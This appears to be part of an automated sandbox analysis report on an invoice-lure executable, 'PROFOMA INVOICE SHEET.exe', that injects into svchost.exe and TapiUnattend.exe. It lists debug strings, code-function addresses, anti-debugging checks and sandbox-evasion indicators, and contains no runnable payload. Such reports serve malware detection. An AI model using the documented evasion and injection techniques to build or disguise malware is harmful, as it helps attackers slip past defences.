            Source: Binary string: wntdll.pdbUGP source: PROFOMA INVOICE SHEET.exe, 00000000.00000003.1700292312.0000000004770000.00000004.00001000.00020000.00000000.sdmp, PROFOMA INVOICE SHEET.exe, 00000000.00000003.1701875462.0000000003A10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2019260041.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2118057527.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2118057527.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2017040925.0000000003800000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000003.2140485338.000000000312B000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4150873460.00000000032E0000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4150873460.000000000347E000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000003.2135530288.0000000002F7C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PROFOMA INVOICE SHEET.exe, 00000000.00000003.1700292312.0000000004770000.00000004.00001000.00020000.00000000.sdmp, PROFOMA INVOICE SHEET.exe, 00000000.00000003.1701875462.0000000003A10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.2019260041.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2118057527.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2118057527.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2017040925.0000000003800000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, TapiUnattend.exe, 00000006.00000003.2140485338.000000000312B000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4150873460.00000000032E0000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4150873460.000000000347E000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000003.2135530288.0000000002F7C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: TapiUnattend.exe, 00000006.00000002.4151512701.000000000390C000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4149956479.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150963531.000000000294C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2439300698.000000002304C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: TapiUnattend.exe, 00000006.00000002.4151512701.000000000390C000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4149956479.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150963531.000000000294C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2439300698.000000002304C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: TapiUnattend.pdb source: svchost.exe, 00000001.00000002.2117869256.0000000003619000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2117847522.0000000003600000.00000004.00000020.00020000.00000000.sdmp, bJWYsPIiPtg.exe, 00000005.00000002.4150058173.0000000000747000.00000004.00000020.00020000.00000000.sdmp
            Source: PROFOMA INVOICE SHEET.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: PROFOMA INVOICE SHEET.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: PROFOMA INVOICE SHEET.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: PROFOMA INVOICE SHEET.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: PROFOMA INVOICE SHEET.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_003042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003042DE
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_00320A76 push ecx; ret 0_2_00320A89
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414856 pushfd ; ret 1_2_00414857
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417869 push edi; iretd 1_2_004177FC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417821 push edi; iretd 1_2_004177FC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040717F push 00000019h; iretd 1_2_0040719C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004061B5 push esp; ret 1_2_004061BB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403240 push eax; ret 1_2_00403242
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00412268 push ds; retf 1_2_0041226D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041222B push ss; iretd 1_2_00412293
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041AAF3 push esi; iretd 1_2_0041AAFA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00412285 push ss; iretd 1_2_00412293
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00404BA0 pushad ; ret 1_2_00404BA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414562 push ebp; retf 1_2_004145CB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414566 push ebp; retf 1_2_004145CB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00426D33 push edi; retf 1_2_00426D3C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418DBC push eax; iretd 1_2_00418DC1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401E4C push BCBDF130h; retf 1_2_00401EB7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401E3E push esi; iretd 1_2_00401E49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401F00 push BCBDF130h; retf 1_2_00401EB7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004177EE push edi; iretd 1_2_004177FC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004177F3 push edi; iretd 1_2_004177FC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004147F2 pushad ; iretd 1_2_004147FA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004177FD push edi; iretd 1_2_004177FC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C309AD push ecx; mov dword ptr [esp], ecx1_2_03C309B6
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033109AD push ecx; mov dword ptr [esp], ecx6_2_033109B6
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_028F4626 push edi; iretd 6_2_028F45B9
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_028F45AB push edi; iretd 6_2_028F45B9
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_028F45BA push edi; iretd 6_2_028F45B9
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_028F45B0 push edi; iretd 6_2_028F45B9
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_028F45DE push edi; iretd 6_2_028F45B9
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_028EEFE8 push ss; iretd 6_2_028EF050
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0031F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0031F98E
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_00391C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00391C41
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-96936
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeAPI/Special instruction interceptor: Address: 3DBC6A4
            Source: C:\Windows\SysWOW64\TapiUnattend.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\TapiUnattend.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\TapiUnattend.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\TapiUnattend.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\TapiUnattend.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\TapiUnattend.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\TapiUnattend.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\TapiUnattend.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7096E rdtsc 1_2_03C7096E
            Source: C:\Windows\SysWOW64\TapiUnattend.exeWindow / User API: threadDelayed 2986Jump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeWindow / User API: threadDelayed 6987Jump to behavior
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeAPI coverage: 3.6 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\TapiUnattend.exeAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\TapiUnattend.exe TID: 7828Thread sleep count: 2986 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exe TID: 7828Thread sleep time: -5972000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exe TID: 7828Thread sleep count: 6987 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exe TID: 7828Thread sleep time: -13974000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe TID: 7860Thread sleep time: -65000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe TID: 7860Thread sleep time: -42000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe TID: 7860Thread sleep count: 33 > 30Jump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe TID: 7860Thread sleep time: -33000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\TapiUnattend.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_003768EE FindFirstFileW,FindClose,0_2_003768EE
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0037698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0037698F
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0036D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0036D076
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0036D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0036D3A9
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_00379642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00379642
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0037979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0037979D
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_00379B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00379B2B
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0036DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0036DBBE
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_00375C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00375C97
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_028FC5F0 FindFirstFileW,FindNextFileW,FindClose,6_2_028FC5F0
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_003042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003042DE
            Source: bJWYsPIiPtg.exe, 00000007.00000002.4150315020.00000000009BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
            Source: TapiUnattend.exe, 00000006.00000002.4149956479.0000000002E84000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
            Source: firefox.exe, 00000008.00000002.2444658727.000001C6A2EBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7096E rdtsc 1_2_03C7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417773 LdrLoadDll,1_2_00417773
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0037EAA2 BlockInput,0_2_0037EAA2
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_00332622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00332622
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_003042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003042DE
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_00324CE8 mov eax, dword ptr fs:[00000030h]0_2_00324CE8
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_03DBC970 mov eax, dword ptr fs:[00000030h]0_2_03DBC970
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_03DBC910 mov eax, dword ptr fs:[00000030h]0_2_03DBC910
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_03DBB2E0 mov eax, dword ptr fs:[00000030h]0_2_03DBB2E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEC3CD mov eax, dword ptr fs:[00000030h]1_2_03CEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h]1_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h]1_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h]1_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h]1_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB63C0 mov eax, dword ptr fs:[00000030h]1_2_03CB63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h]1_2_03CDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h]1_2_03CDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE3DB mov ecx, dword ptr fs:[00000030h]1_2_03CDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h]1_2_03CDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD43D4 mov eax, dword ptr fs:[00000030h]1_2_03CD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD43D4 mov eax, dword ptr fs:[00000030h]1_2_03CD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C663FF mov eax, dword ptr fs:[00000030h]1_2_03C663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h]1_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h]1_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h]1_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5438F mov eax, dword ptr fs:[00000030h]1_2_03C5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5438F mov eax, dword ptr fs:[00000030h]1_2_03C5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h]1_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h]1_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h]1_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov ecx, dword ptr fs:[00000030h]1_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFA352 mov eax, dword ptr fs:[00000030h]1_2_03CFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD8350 mov ecx, dword ptr fs:[00000030h]1_2_03CD8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD437C mov eax, dword ptr fs:[00000030h]1_2_03CD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h]1_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h]1_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h]1_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C310 mov ecx, dword ptr fs:[00000030h]1_2_03C2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C50310 mov ecx, dword ptr fs:[00000030h]1_2_03C50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h]1_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h]1_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h]1_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E284 mov eax, dword ptr fs:[00000030h]1_2_03C6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E284 mov eax, dword ptr fs:[00000030h]1_2_03C6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h]1_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h]1_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h]1_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402A0 mov eax, dword ptr fs:[00000030h]1_2_03C402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402A0 mov eax, dword ptr fs:[00000030h]1_2_03C402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov ecx, dword ptr fs:[00000030h]1_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
